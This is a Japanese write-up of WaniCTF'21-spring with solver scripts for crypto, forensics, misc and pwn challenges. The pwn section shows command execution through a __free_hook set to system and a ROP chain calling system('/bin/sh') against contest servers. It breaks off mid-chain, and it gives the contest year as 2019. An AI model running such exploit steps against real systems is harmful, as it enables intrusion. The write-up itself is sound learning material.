WaniCTF'21-spring Writeup

この大会は2019/4/30 10:00(JST)~2019/5/2 20:00(JST)に開催されました。
この大会は個人戦。結果は4651点で450人中31位でした。
非常に残念。もう少し上位に行きたかった。

スコアのカテゴリごとの分布はこんな感じ。やはりPwn, Webが弱いか。

f:id:satou-y:20210504091005p:plain

あとで他の人のWriteupを見ると、こんなことかという問題もあったが、それに気づかなかったこととか、やってみなかったことを反省です。
自分の解けた問題をWriteupとして書いておきます。

Simple conversion (Crypto)

int.from_bytesでフラグ文字列が数値になっているだけなので、数値を文字列化してフラグ文字列に戻す。

#!/usr/bin/python3

with open('output.txt', 'r') as f:
    enc = int(f.read())

flag = enc.to_bytes((enc.bit_length() + 7) // 8, 'big')
print(flag)
FLAG{7h1s_i5_h0w_we_c0nvert_m3ss@ges_1nt0_num63rs}

Easy (Crypto)

Affine cipherのコードのようだ。A, Bの値をブルートフォースして復号する。

#!/usr/bin/python3
from Crypto.Util.number import *

def decrypt(ciphertext: str, a: int, b: int) -> str:
    plaintext = ''
    for x in ciphertext:
        if 'A' <= x <= 'Z':
            x = ord(x) - ord('A')
            x = ((x - b) * inverse(a, 26)) % 26
            x = chr(x + ord('A'))
        plaintext += x

    return plaintext

with open('output.txt', 'r') as f:
    enc = f.read().rstrip()

found = False
for a in range(26):
    for b in range(26):
        flag = decrypt(enc, a, b)
        if flag.startswith('FLAG'):
            found = True
            print(flag)
            break
    if found:
        break
FLAG{WELCOMETOCRYPTOCHALLENGE}

Can't restore the flag? (Crypto)

サーバは、フラグを指定の数値で割った余りの数値を表示する。2以上300以下で試し、CRTによりflagを求める。

import socket
from sympy.ntheory.modular import crt
from Crypto.Util.number import long_to_bytes

def recvuntil(s, tail):
    data = ''
    while True:
        if tail in data:
            return data
        data += s.recv(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('crt.cry.wanictf.org', 50000))

mod_list = []
rem_list = []
for mod in range(2, 301):
    data = recvuntil(s, '> ')
    print data + str(mod)
    s.sendall(str(mod) + '\n')
    data = recvuntil(s, '\n').rstrip()
    print data
    mod_list.append(mod)
    rem_list.append(int(data))

flag = crt(mod_list, rem_list)[0]
flag = long_to_bytes(flag)
print(flag)

実行結果は以下の通り。

Mod > 2
0
Mod > 3
2
Mod > 4
2
  :
Mod > 297
65
Mod > 298
56
Mod > 299
293
Mod > 300
290
FLAG{Ch1n3s3_r3m@1nd3r_7h30r3m__so_u5eful}
FLAG{Ch1n3s3_r3m@1nd3r_7h30r3m__so_u5eful}

Extra (Crypto)

RSA暗号だが、Mの値 (M = 2 * p + q) もわかっている。わかっていることから式を変形する。

q = M - 2 * p
N = p * q = p * (M - 2 * p) = - 2 * p**2 + M * p

このことから、以下の方程式を解けばpがわかり、qもわかる。

2 * p**2 - M * p + N = 0

あとはそのまま復号すればよい。

from sympy import *
from Crypto.Util.number import *

with open('output.txt', 'r') as f:
    N = int(f.readline().rstrip().split(' ')[-1])
    M = int(f.readline().rstrip().split(' ')[-1])
    e = int(f.readline().rstrip().split(' ')[-1])
    c = int(f.readline().rstrip().split(' ')[-1])

p = Symbol('p')
eq = Eq(2 * p**2 - M * p + N)
ans = solve(eq)

for p in ans:
    if type(p) == Integer:
        p = int(p)
        break

q = N / p
assert N == p * q

phi = (p - 1) * (q - 1)
d = inverse(e, phi)
m = pow(c, d, N)
flag = long_to_bytes(m)
print flag
FLAG{@n_ex7ra_param3ter_ru1n5_3very7h1n9}

OUCS (Crypto)

サーバのコードから、通常のOkamoto–Uchiyama cryptosystemで、4つの選択肢から選択すると、対応する処理をして表示をすることがわかる。この暗号では、Enc(a + b) = Enc(a) * Enc(b) になることから、Enc(flag) * Enc(flag) = Enc(flag * 2)になる。このことを使って、復号する。

import socket
from Crypto.Util.number import long_to_bytes

def recvuntil(s, tail):
    data = ''
    while True:
        if tail in data:
            return data
        data += s.recv(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('oucs.cry.wanictf.org', 50010))

data = recvuntil(s, '> ')
print data + '4'
s.sendall('4\n')
data = recvuntil(s, '\n').rstrip()
print data
n = eval(data.split(' = ')[1])

data = recvuntil(s, '> ')
print data + '1'
s.sendall('1\n')
data = recvuntil(s, '\n').rstrip()
print data
flag_enc = eval(data.split(' = ')[1])

c = pow(flag_enc, 2, n)

data = recvuntil(s, '> ')
print data + '3'
s.sendall('3\n')

data = recvuntil(s, '> ')
print data + str(c)
s.sendall(str(c) + '\n')
data = recvuntil(s, '\n').rstrip()
print data
m = eval(data.split(' = ')[1])

m = m / 2

flag = long_to_bytes(m)
print flag

実行結果は以下の通り。

  .oooooo.   ooooo     ooo   .oooooo.    .oooooo..o
 d8P'  `Y8b  `888'     `8'  d8P'  `Y8b  d8P'    `Y8
888      888  888       8  888          Y88bo.
888      888  888       8  888           `"Y8888o.
888      888  888       8  888               `"Y88b
`88b    d88'  `88.    .8'  `88b    ooo  oo     .d8P
 `Y8bood8P'     `YbodP'     `Y8bood8P'  8""88888P'


╭─────────────────────╮
│ 1. Encrypt flag     │
│ 2. Encrypt          │
│ 3. Decrypt          │
│ 4. Show public key  │
│ 5. Exit             │
╰─────────────────────╯
> 4
n = 0x91fa8c5293fd52c9e84437f64b8aebd95ac9fea83a8f5b648ee6f90889fd9143e200e5825812a229d862922d81035f0dc0633c5d0ecaf0ad450dc169f0415c5a374407e29771bae86edb5e1d6ded87da4657be393fccb69853c1dd5649dd2e067e12edd35d8cffef24a3cd20c4a512c7f4f2164b920619599806bf1675ebccc6d14f1c6df0c7bd7e16acd58bd6f06695572760ca9ed85c331b072fe9a32cf3b0c1555bf20e9e28cfac54f1b1da4912f89806391b603a0ce4b9e9f9c85a1bdec99868e67322c29b70f269e327a2dfaae31ec7d258ad68fdf98a08edcd6274f6563a947c63111cc5bf83fc0784a8608df38eccfb3e3b082ce8f67f894bfac66f9646631d51de783407e14bcbaeff2aaa741923d045d4c909a7fc2ec9fd504e14918837304204ded0e897f6cc56d26cfe6f50712439d7b77842b5f250a51632eb3219b4b372bbf4660b77df742f30c48a4969095f8b07eebd9264d238c26feedb8e7f4171ea21ce33bee5a5c59a48ee5f573ad8be4d0649a33062fd0d2775c44bdf
g = 0x58da84ccd9b88a939e780b265ab615d98443e1b6a4f4ec70ef9fa3a75056806f1045b68621d6174c673938af61313d90c5e008186d450a2cdf745e087704ffc7d92c5c6e72ead1269c646845153edb3e2cd7cfc55a58cbb661e8d692539d1d882c3605f73afe2f4e3638f14c215890402683f12741d33724fc7d6490217ea15b38507407b414ce09649c2d671b4e6a609153532533a4eb717522a5a5368f040af0c58594afb4c23de02cb6e901b743c715e06d8cae7439b475ab527f5a8268ea5ba681dc08ccd6b90ecdd06edb42452a6120c147193e6ee700fba7e846a31e66810f0381ef5271f4b13816b668c81f6920b756e327fc77199af53e2ff7c1259203c7292219705100c33d7e33035c9dd727dda30e21467b40160884eb871e27ea70dfed1e408b125c71c24eb71b84cf3b96c71b80c23f9bc783c30952ade8bdb9b8eaabf007709f2bbc89b68ff659da624ac7099dfd7a4af4969a1a95b4dfc2dc13cb61f24e02e67e16f3887bcd03b0d3eaa62df005e3bc1007bbac503671d18
h = 0x59f2dbdae465c14f45d62e0a681e80284b6e903332375df321801ff86d9d4a3680fad61b3e825dd2cab7bfce88663a60635b53298e65957587d6a3d22f2494124c77e0c32006806fa27ef6f3c24ed9dd2c9f6657aec465772a4babe0c4be27c0267a9400c5f1f2e46552e128b81b0491545900e594cabc4d2f3f60018d23d48d07c866f51d91d8f5aff7f12110ca7200dccb72f26c59311cd02dc40ffce426f92c674ad85039ac7904ec5fb0c025903eeb94d53ca2bf6a0421d79543c72b27e9f431409bc9508e3f59ad91fe223b43e5c57afbe08e10c05d75e7ad15541b5fa000c1be457d820cc6c2ccda70c3f2640e340d8deecc821a382303c2e638b013e8d4248a80c888d530946fa35b8fedeb9a8b63ac432bcbec39c26e38e382ff09b18b6199def31c152e04031ebd9192ef5cc961b580aa74872e17d910c1aed3e2522f338720d71b412bf5968dad7a3214fa2a243aa5b6ba3fe84bc2c7cf24afa98447eccbd0d1221a92f152c9096842001dad8507da1f1c4fa5ed6d1608d1732d34

╭─────────────────────╮
│ 1. Encrypt flag     │
│ 2. Encrypt          │
│ 3. Decrypt          │
│ 4. Show public key  │
│ 5. Exit             │
╰─────────────────────╯
> 1
ciphertext = 0x33f3e42d5ffceb31473a03feabe574b6209005eeeac2142756a1d06fc002d2d30a2a366c86e322e39852d777a5251858a7d197d5b93d672a37c09930af76053060ac6d06275112c0f2892d0b3b634e670c0b9f45b4deacf0eddc1161b31798bc3c8024a00459cd0ec1c69b751357fb8ad625a83c91ca7b2eae9e81f2c9badfe300441c58f861b5ed7472bca50b86999638a7da8b0956661c168f467567e741c622186c103838a8f8d51276e4a247823214fd7b2cd95c3bcb64693f291e1d324e255e824655e94fddae751c09bca99e71d9c69e58ec0cffad5515992a362d756661c2ef3b34fac50db2c3c1c700960312d169e5fa92ba3b00b2e6bfb7938e1dfdbee52cb2dc4c4f3d61ac1498318be999a4e5da53e20e97e754df7ccfe1f8971ea676239e4b5a304f546c2db8d7b9573bfa1a838e18e65a6df7b1ed16c7175cad82023253539e83e14cfcae2b4d34ac308e80e3c7787568c386a12c869c22e40683f743661514e9618eb9bf599a692a76d3502616a83019d490c07beef40eabf3

╭─────────────────────╮
│ 1. Encrypt flag     │
│ 2. Encrypt          │
│ 3. Decrypt          │
│ 4. Show public key  │
│ 5. Exit             │
╰─────────────────────╯
> 3
Enter your ciphertext
> 972502408448353733722317501707311270567983254039876442607508119290611415301354130975690806304957275839049056511537564462169539550781353847251487955524001806208733683164616063161142591094650455415772105150298335959838639695103265543469663771476737545866023727163036821109449829188994769485495428515699559938683253328177410152110422109983126644966297670856790946955820334738120411921636741917740481195949951986513315901493776931936120646265522877321494961812836019797491478649109283951720896092842745779316624271453851315233640772276708106770785351611010554556116226991209979276968069712968404732384082770663418993425145805207348541130113867933154005943584952915342553770635138425308016438617088978537389674219007308106481297071241786104337345579938848904582114590904489584988433401027544524232677022451052518355762996080450703429677781999427311046256151338108546732373191614424875540283736944546830720280634452838877435446613
plaintext = 0x8c98828ef69eaabec860cae6bedc60e8bee4cae0e4ca6a66dce8be9ee6c2d6c2beaadcd2eccae4e6d2e8f2bec4eae8be9ed6c2dadee8de5aaac6d0d2f2c2dac2fa
FLAG{OU_d0es_n0t_repre53nt_Osaka_University_but_Okamoto-Uchiyama}
FLAG{OU_d0es_n0t_repre53nt_Osaka_University_but_Okamoto-Uchiyama}

presentation (Forensics)

ppsxが添付されていて、このファイルを開いてみるが、「FLAG{xxx}」のxxxがマスクされていてわからない。zip解凍して、\presentation\ppt\slides\slide1.xmlを見ると、FLAG{}の中身がわかる。

FLAG{you_know_how_to_edit_ppsx}

secure document (Forensics)

flag_20210428.zipというパスワード付きzipと、以下の内容がかいてある password-generator というファイルが添付されている。

::the::
Send, +wani
return

::password::
Send, +c+t+f
return

::for::
Send, {home}{right 3}{del}1{end}{left 2}{del}7
return

::today::
FormatTime , x,, yyyyMMdd
SendInput, {home}{right 4}_%x%
return

::is::
Send, _{end}{!}{!}{left}
return

:*?:ni::
Send, ^a^c{Esc}{home}password{:} {end}
return

"SendInput"や"FormatTime"など調べてみたら、AutoHotKeyのコマンドになっている。http://ahkwiki.net/Sendなどを参考にする。問題には以下のように書いてあるので、そのように打鍵したときにどう出力されるのかを順を追って考える。

the password for today is nani
["the"完了時]
Wani

["password"完了時]
WaniCTF

["for"完了時]
Wan1C7F

["today"完了時]
Wan1_20210428C7F

["is"完了時]
Wan1_20210428_C7F!!

["nani"完了時]
password: Wan1_20210428_C7F!na!

このパスワードでflag_20210428.zipを解凍すると、flag.jpgが展開される。この画像ファイルにフラグが書いてあった。
f:id:satou-y:20210504095910j:plain

FLAG{Nani!very_strong_password!}

slow (Forensics)

wavが添付されているので、Audacityで見てみる。
f:id:satou-y:20210504100748p:plain
平坦に見える波形で、wavの画像受信データがありそうなので、sstvのツールでデコードしてみる。

$ sstv -d slow.wav -o flag.png
[sstv] Searching for calibration header... Found!    
[sstv] Detected SSTV mode Martin 1
[sstv] Decoding image...   [#############################################] 100%
[sstv] Drawing image data...
[sstv] ...Done!

画像を見たら、フラグが書いてあった。
f:id:satou-y:20210504100940p:plain

FLAG{encoded_by_slow-scan_television}

illegal image (Forensics)

裏で画像データをやり取りしていると問題にあることからICMPの通信に隠されていると推測する。ICMP通信を見ると、JPEGデータが送信されているのがわかったので、取り出し結合する。

from scapy.all import *

packets = rdpcap('illegal_image.pcap')

flag = ''
for p in packets:
    if p.haslayer(ICMP) and p[ICMP].type == 0:
        flag += p[Raw].load

with open('flag.jpg', 'wb') as f:
    f.write(flag)

f:id:satou-y:20210504101125j:plain
画像にフラグが書いてあった。

FLAG{ICMP_Exfiltrate_image}

binary (Misc)

サンプルコードは"WANI"という文字列をbit文字列にして表示後、元に戻して表示している。元に戻すコードもあるので、それを使って元に戻す。

#!/usr/bin/python3
with open('binary.csv', 'r') as f:
    bits = [int(bit) for bit in f.read().rstrip().split('\n')]

s = ''
c = 0
for i in range(len(bits)):
    val = int(bits[i])
    c = (c << 1) | val
    if i % 8 == 7:
        s = s + chr(c)
        c = 0

print(s)
FLAG{the_basic_knowledge_of_communication}

Git Master (Misc)

Dokerのイメージを配布しているURLが提示されている。イメージからコンテナを構築し、入ってみる。

$ sudo docker pull wanictf21spring/nginx_on_ubuntu
Using default tag: latest
latest: Pulling from wanictf21spring/nginx_on_ubuntu
a70d879fa598: Pull complete 
c4394a92d1f8: Pull complete 
10e6159c56c0: Pull complete 
0ff2c7c262e9: Pull complete 
3ca67b0aea04: Pull complete 
Digest: sha256:2f26ab46d70e32b71811700c68beb7a7d9ef6041f90bab205c81ac52699c51fc
Status: Downloaded newer image for wanictf21spring/nginx_on_ubuntu:latest
docker.io/wanictf21spring/nginx_on_ubuntu:latest
$ sudo docker run -dit --name gitmaster -p 80:80 wanictf21spring/nginx_on_ubuntu:latest
bbaa6aa613998b55feaf6d724ad0292583e030b75af3e82ebae73cab8a2db4f8
$ sudo docker exec -it gitmaster /bin/bash
root@bbaa6aa61399:/var/www# cd html
root@bbaa6aa61399:/var/www/html# ls -la
total 52
drwxr-xr-x 1 root root  4096 Apr 13 04:39 .
drwxr-xr-x 1 root root  4096 Apr 13 04:57 ..
-rw-r--r-- 1 root root    10 Apr 13 04:39 Flag.txt
drwxr-xr-x 6 root root  4096 Apr 13 01:07 assets
-rw-r--r-- 1 root root 17542 Apr 13 01:07 favicon.ico
-rw-r--r-- 1 root root  9365 Apr 13 00:01 index.html
-rw-r--r-- 1 root root   612 Apr 13 02:17 index.nginx-debian.html
root@bbaa6aa61399:/var/www/html# cat Flag.txt
FLAG{y0u_

フラグの断片があった。

root@bbaa6aa61399:/var/www/html# cd ..
root@bbaa6aa61399:/var/www# ls -la
total 32
drwxr-xr-x 1 root root 4096 Apr 13 04:57 .
drwxr-xr-x 1 root root 4096 Apr 13 02:17 ..
drwxr-xr-x 8 root root 4096 Apr 13 04:39 .git
-rw-r--r-- 1 root root  181 Apr 13 04:39 Dockerfile
-rw-r--r-- 1 root root   95 Apr 13 04:39 docker-compose.yml
drwxr-xr-x 1 root root 4096 Apr 30 14:47 html

.gitディレクトリがあったので、ローカルに転送するためにアーカイブにする。

root@bbaa6aa61399:/var/www# tar cvf html/git.tar ./.git
./.git/
./.git/branches/
./.git/info/
./.git/info/exclude
./.git/objects/
./.git/objects/44/
./.git/objects/44/702362495fe66f887448f98bc0b5d6be503efb
./.git/objects/08/
./.git/objects/08/2edd4e7b973fe74e0a2c21b14d52ce95517330
./.git/objects/a2/
./.git/objects/a2/fed4a4a6a1d608e43d0e18968666e6cb235526
./.git/objects/8d/
./.git/objects/8d/d61184bf3d290085c43d541865bc2fe2a60844
./.git/objects/51/
./.git/objects/51/1bb8eac45d3f039e2ab5eec36ce8dd687f5d63
./.git/objects/f4/
./.git/objects/f4/fff0471d0d6521eb609d30f760a298cd9541f9
./.git/objects/c8/
./.git/objects/c8/d70ab0fd2520d5530468ac8a007954f1052ad9
./.git/objects/45/
./.git/objects/45/5b47a724881078a55e9cf145b49c4d847ef9f4
./.git/objects/ef/
./.git/objects/ef/189e042918048fad826998ed2ff17e56654eb4
./.git/objects/a4/
./.git/objects/a4/634183951546581a0d2735d85f21a419dc0c72
./.git/objects/77/
./.git/objects/77/a56b2b0e0275d772199fdc1b07102e27aede11
./.git/objects/64/
./.git/objects/64/a9f8c7602cfcc5dfef19d8a18828779cc05d3f
./.git/objects/c0/
./.git/objects/c0/ac3406b60ce14584dbef504293f429a7a102e3
./.git/objects/c0/a94e2c012291136cccebdd0b357b26a3f63aa5
./.git/objects/35/
./.git/objects/35/1090df79c57012ab2712901728d32b0594a69a
./.git/objects/35/ae69523d6f97cbadebe413def050adb547e35a
./.git/objects/14/
./.git/objects/14/a76c6030cf11b6241f0df80480ce5cdf3db695
./.git/objects/69/
./.git/objects/69/19be129dd806595762632b6ca24ebab8fe593e
./.git/objects/4c/
./.git/objects/4c/0f80e390ddfa7c58914a4d2e4863788c23c415
./.git/objects/70/
./.git/objects/70/157c02757232ae17be60459945acd920f2b538
./.git/objects/b4/
./.git/objects/b4/1601462b20845f9e0680fa77ebccd2cf42fe7c
./.git/objects/info/
./.git/objects/fe/
./.git/objects/fe/2ed860f4ccf421ff9316e614128de5fea7ade3
./.git/objects/b3/
./.git/objects/b3/d46d127fce3c8c3d2cb8a234a6d3f7bb8bbcaf
./.git/objects/3a/
./.git/objects/3a/614b08e15c6fc282376f13b825ad0652f58cf8
./.git/objects/d4/
./.git/objects/d4/c4bca3f2dc59ae22a76308c01700a2786de3cd
./.git/objects/d4/3a3b21ce5236a1b8937fd149ec9514751fb1a2
./.git/objects/aa/
./.git/objects/aa/8cfc4b21158aa896f1676f44f675eba1067210
./.git/objects/6e/
./.git/objects/6e/7b9d9c4fab5ef27ede4568f557b0dff4e1b3ae
./.git/objects/42/
./.git/objects/42/8833073ab18a3890a89de8c8066969baa0a295
./.git/objects/2b/
./.git/objects/2b/a1903e57dd6f37d64f195c43fe6d73abb6725b
./.git/objects/2b/fd1c362f310a7fbb2be6fd3546819d456b4499
./.git/objects/6a/
./.git/objects/6a/784d9649db84ce32196cfc5091303a87042467
./.git/objects/f1/
./.git/objects/f1/43641105c1de6e660ca2f71b85b1eea2cb49a1
./.git/objects/73/
./.git/objects/73/7f9d108236e05f619c40963e92285bb643663a
./.git/objects/a1/
./.git/objects/a1/97abfccd60d55469f62622796897f9ee891f18
./.git/objects/4d/
./.git/objects/4d/44f68a4f1e7fedf2c7962be92a9a28b9bb4868
./.git/objects/95/
./.git/objects/95/9a27def1ad3d80095b73cb2ff262100212497a
./.git/objects/d9/
./.git/objects/d9/868ef339a2c7d8d9975cdd549101081649f89d
./.git/objects/92/
./.git/objects/92/84d6d93b19e5b2ae3ea963138fe08157d4e3fa
./.git/objects/60/
./.git/objects/60/ca0b1f76d898f5c11a381592d5c37385bebea8
./.git/objects/60/f12b5453bbc53db87ac77d580361c0b1993c77
./.git/objects/1f/
./.git/objects/1f/c314c2c56d52bd2381d98c0a59ea8a8deeed6b
./.git/objects/e2/
./.git/objects/e2/599825e618a7978ff3ed2f20b0bc33ef216f6d
./.git/objects/0b/
./.git/objects/0b/c052a041629b6b33a6b675b7b705727cf2b2ba
./.git/objects/05/
./.git/objects/05/8a5020310afc637ee59cf3dfc371d2be91b4d0
./.git/objects/94/
./.git/objects/94/087f63576bee2a81dc315efd864a01f2da0897
./.git/objects/9f/
./.git/objects/9f/79020f7c87498b2c31631320a819b6ce5f7db8
./.git/objects/9f/578c697df49ea14e2887b1eef7d5b0d47bfc58
./.git/objects/dc/
./.git/objects/dc/47e3a0eb6537174801f7223ef27315ab37ae2c
./.git/objects/f9/
./.git/objects/f9/9f791c31212b6663f3f5d3e29b7caf8dac887e
./.git/objects/ae/
./.git/objects/ae/26825ee9c437fd3b7fcddcd5ccea9545f7389e
./.git/objects/8b/
./.git/objects/8b/3b277314f0791fbab20b30df2c898c7ddf6644
./.git/objects/ee/
./.git/objects/ee/2ff0e832bb3b55b67365897f837678964bba11
./.git/objects/6c/
./.git/objects/6c/c0b29f5ce571d1a1e36b43d91681dbae7c22aa
./.git/objects/e4/
./.git/objects/e4/c9da8d153ceb2efdc7521ac71d522ca7ca5fb7
./.git/objects/f0/
./.git/objects/f0/07f269599e168777f376e71d5d84020f3bbbaf
./.git/objects/cb/
./.git/objects/cb/29ddc5d574be325a2485fbb71bc1f00ce7208c
./.git/objects/cb/6f48aff726e3a861bce276c654140136ab40ce
./.git/objects/cb/2205c8960db8cb7bd6dcc31a5d00fde863f8f4
./.git/objects/pack/
./.git/objects/4a/
./.git/objects/4a/182be10739fa02222e2502870637bd3126a1fb
./.git/objects/1b/
./.git/objects/1b/5bfaf9a29aff8173115b388e097765d9563252
./.git/objects/7a/
./.git/objects/7a/3aa17c3ef5b0aa44f1f465444d904f9d67082d
./.git/objects/49/
./.git/objects/49/ceff2ab5d8e556a73c6cc2ebd5435559d83bbf
./.git/objects/03/
./.git/objects/03/63feb595d0b1e45d95c12df2d1705fbb71f0bd
./.git/objects/03/8e7a9db5adf5356ec2dadfbff45d0a2127e1f0
./.git/objects/d5/
./.git/objects/d5/6105569614e51c85ceb1a32994bf4711418439
./.git/objects/79/
./.git/objects/79/c413edb2d73bad622242e1644709f70b5da3d2
./.git/refs/
./.git/refs/tags/
./.git/refs/original/
./.git/refs/heads/
./.git/refs/heads/master
./.git/refs/heads/temporary
./.git/ORIG_HEAD
./.git/HEAD
./.git/index
./.git/hooks/
./.git/hooks/pre-applypatch.sample
./.git/hooks/update.sample
./.git/hooks/pre-rebase.sample
./.git/hooks/pre-merge-commit.sample
./.git/hooks/pre-receive.sample
./.git/hooks/fsmonitor-watchman.sample
./.git/hooks/prepare-commit-msg.sample
./.git/hooks/pre-push.sample
./.git/hooks/applypatch-msg.sample
./.git/hooks/commit-msg.sample
./.git/hooks/pre-commit.sample
./.git/hooks/post-update.sample
./.git/description
./.git/logs/
./.git/logs/refs/
./.git/logs/refs/heads/
./.git/logs/refs/heads/master
./.git/logs/refs/heads/temporary
./.git/logs/HEAD
./.git/COMMIT_EDITMSG
./.git/config

ローカルに戻って、作成したtarをダウンロードし、解凍する。いろいろオブジェクトを確認していく。

$ python -c 'import zlib; print zlib.decompress(open("objects/ae/26825ee9c437fd3b7fcddcd5ccea9545f7389e").read())' | xxd -g 1
00000000: 74 72 65 65 20 31 34 36 00 31 30 30 36 34 34 20  tree 146.100644 
00000010: 46 6c 61 67 2e 74 78 74 00 ef 18 9e 04 29 18 04  Flag.txt.....)..
00000020: 8f ad 82 69 98 ed 2f f1 7e 56 65 4e b4 34 30 30  ...i../.~VeN.400
00000030: 30 30 20 61 73 73 65 74 73 00 2b fd 1c 36 2f 31  00 assets.+..6/1
00000040: 0a 7f bb 2b e6 fd 35 46 81 9d 45 6b 44 99 31 30  ...+..5F..EkD.10
00000050: 30 36 34 34 20 66 61 76 69 63 6f 6e 2e 69 63 6f  0644 favicon.ico
00000060: 00 73 7f 9d 10 82 36 e0 5f 61 9c 40 96 3e 92 28  .s....6._a.@.>.(
00000070: 5b b6 43 66 3a 31 30 30 36 34 34 20 69 6e 64 65  [.Cf:100644 inde
00000080: 78 2e 68 74 6d 6c 00 6e 7b 9d 9c 4f ab 5e f2 7e  x.html.n{..O.^.~
00000090: de 45 68 f5 57 b0 df f4 e1 b3 ae 0a              .Eh.W.......

$ python -c 'import zlib; print zlib.decompress(open("objects/ef/189e042918048fad826998ed2ff17e56654eb4").read())'
blob 9_m45t3r}
$ python -c 'import zlib; print zlib.decompress(open("objects/c8/d70ab0fd2520d5530468ac8a007954f1052ad9").read())' | xxd -g 1
00000000: 74 72 65 65 20 31 34 36 00 31 30 30 36 34 34 20  tree 146.100644 
00000010: 46 6c 61 67 2e 74 78 74 00 f9 9f 79 1c 31 21 2b  Flag.txt...y.1!+
00000020: 66 63 f3 f5 d3 e2 9b 7c af 8d ac 88 7e 34 30 30  fc.....|....~400
00000030: 30 30 20 61 73 73 65 74 73 00 2b fd 1c 36 2f 31  00 assets.+..6/1
00000040: 0a 7f bb 2b e6 fd 35 46 81 9d 45 6b 44 99 31 30  ...+..5F..EkD.10
00000050: 30 36 34 34 20 66 61 76 69 63 6f 6e 2e 69 63 6f  0644 favicon.ico
00000060: 00 73 7f 9d 10 82 36 e0 5f 61 9c 40 96 3e 92 28  .s....6._a.@.>.(
00000070: 5b b6 43 66 3a 31 30 30 36 34 34 20 69 6e 64 65  [.Cf:100644 inde
00000080: 78 2e 68 74 6d 6c 00 6e 7b 9d 9c 4f ab 5e f2 7e  x.html.n{..O.^.~
00000090: de 45 68 f5 57 b0 df f4 e1 b3 ae 0a              .Eh.W.......

$ python -c 'import zlib; print zlib.decompress(open("objects/f9/9f791c31212b6663f3f5d3e29b7caf8dac887e").read())'
blob 164r3_p3rf3c7_g1t

Flag.txtの編集履歴から見つけた文字列を結合する。

FLAG{y0u_4r3_p3rf3c7_g1t_m45t3r}

Automaton Lab (Misc)

Rule30のルールに従って、Q1, Q2はそのまま答える。Q3は非常に大きいが、途中でループになるはずなので、ループのサイクルを割り出し、そのインデックスを求め、答える。

import socket

def recvuntil(s, tail):
    data = ''
    while True:
        if tail in data:
            return data
        data += s.recv(1)

def get_next_str(s):
    dic = {'111': '0', '110': '0', '101': '0', '100': '1',
        '011': '1', '010': '1', '001': '1', '000': '0'}
    d = ''
    for i in range(len(s)):
        t = s[i-1] + s[i] + s[(i+1)%len(s)]
        d += dic[t]
    return d

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('automaton.mis.wanictf.org', 50020))

data = recvuntil(s, ')\n').rstrip()
print data
s.sendall('\n')

data = recvuntil(s, '> ')
print data[:-1],
automaton = data.split('\n')[-3].split(' ')[-1]
gen = int(data.split('\n')[-2].split(' ')[-1])

for i in range(gen):
    automaton = get_next_str(automaton)

print automaton
s.sendall(automaton + '\n')

data = recvuntil(s, '> ')
print data[:-1],
automaton = data.split('\n')[-3].split(' ')[-1]
gen = int(data.split('\n')[-2].split(' ')[-1])

for i in range(gen):
    automaton = get_next_str(automaton)

print automaton
s.sendall(automaton + '\n')

data = recvuntil(s, '> ')
print data[:-1],
automaton = data.split('\n')[-3].split(' ')[-1]
gen = int(data.split('\n')[-2].split(' ')[-1])

answers = [automaton]
for i in range(2**15):
    automaton = get_next_str(automaton)
    if automaton not in answers:
        answers.append(automaton)
    else:
        index = answers.index(automaton)
        print index
        break

answers = answers[index:]

cycle_len = len(answers)
automaton = answers[((gen - index) % cycle_len)]
print automaton
s.sendall(automaton + '\n')

data = recvuntil(s, '\n').rstrip()
print data
data = recvuntil(s, '\n').rstrip()
print data

実行結果は以下の通り。

Welcome to Automaton Lab.!
We study about automaton in there, here is the space of "Rule 30"[1] automaton.
We breed 15 cells automaton now, they are ring-connected -- they are connected the first cell and the last cell.
Our interest is what this cute automaton grow up in future, we want your help to expect their growth.
[1]: https://en.wikipedia.org/wiki/Rule_30

For example, now automaton state is "100000100000001" ('1' is alive and '0' is dead) and in next generation they are "010001110000011".
generation      state
0               100000100000001
1               010001110000011
2               011011001000110

We give you initial state(init) and generation(gen). You write down the state of this automaton of the nth generation in binary.
Are you ready?
(press enter key to continue)
OK! Here we go! The first question is warming up.
init = 011101010111100
gen = 7
> 110010111001000
Great! The second question is below.
init = 000110000000000
gen = 997
> 101011110101111
Even if human become extinct, we wanna see the view of prosperity of cell automaton. This is last question.
init = 000000000000001
gen = 126398516620674013019848789864125130087754056459005394082216364042030884420341986809725135763853530970927817015726724392576100867235130072915186626915539006159827017021536585317153119779669735542196802036197311048258357232726626315375252420455232968913174748940431822360827924726272991102219461489407251273261
> 47
011110110000001
Jesus!!! Are you the genius of future sight? We award you the special prize.
FLAG{W3_4w4rd_y0u_d0c70r473_1n_Fu7ur3_S1gh7}
FLAG{W3_4w4rd_y0u_d0c70r473_1n_Fu7ur3_S1gh7}

01 netcat (Pwn)

ncで接続するだけ。

$ nc netcat.pwn.wanictf.org 9001
congratulation!
please enter "ls" command
ls
chall
flag.txt
redir.sh
cat flag.txt
FLAG{this_is_the_same_netcat_problem_as_previous_one}
FLAG{this_is_the_same_netcat_problem_as_previous_one}

02 free hook (Pwn)

__free_hookにsystem関数が設定されている。freeでメモリ開放するデータが__free_hookに渡されるので、memoとして実行したいコマンドを登録して、削除するようにすれば、指定したコマンドを実行できる。

$ nc free.pwn.wanictf.org 9002
1: add memo
2: view memo
9: del memo
command?: 1
index?[0-9]: 0
memo?: ls



[[[list memos]]]
***** 0 *****
ls


1: add memo
2: view memo
9: del memo
command?: 9
index?[0-9]: 0
chall
flag.txt
redir.sh



[[[list memos]]]

1: add memo
2: view memo
9: del memo
command?: 1
index?[0-9]: 0
memo?: cat flag.txt



[[[list memos]]]
***** 0 *****
cat flag.txt


1: add memo
2: view memo
9: del memo
command?: 9
index?[0-9]: 0
FLAG{malloc_hook_is_a_tech_for_heap_exploitation}



[[[list memos]]]

1: add memo
2: view memo
9: del memo
command?:
FLAG{malloc_hook_is_a_tech_for_heap_exploitation}

03 rop machine easy (Pwn)

問題によれば、"/bin/sh"のアドレスは提供されているので、system("/bin/sh")を実行できればよい。

$ nc rop-easy.pwn.wanictf.org 9003

"/bin/sh" address is 0x404070

[menu]
1. append hex value
2. append "pop rdi; ret" addr
3. append "system" addr
8. show menu (this one)
9. show rop_arena
0. execute rop
> 2
"pop rdi; ret" is appended
> 1
hex value?: 0x404070
0x0000000000404070 is appended
> 3
"system" is appended
> 9
     rop_arena
+--------------------+
| pop rdi; ret       |<- rop start
+--------------------+
| 0x0000000000404070 |
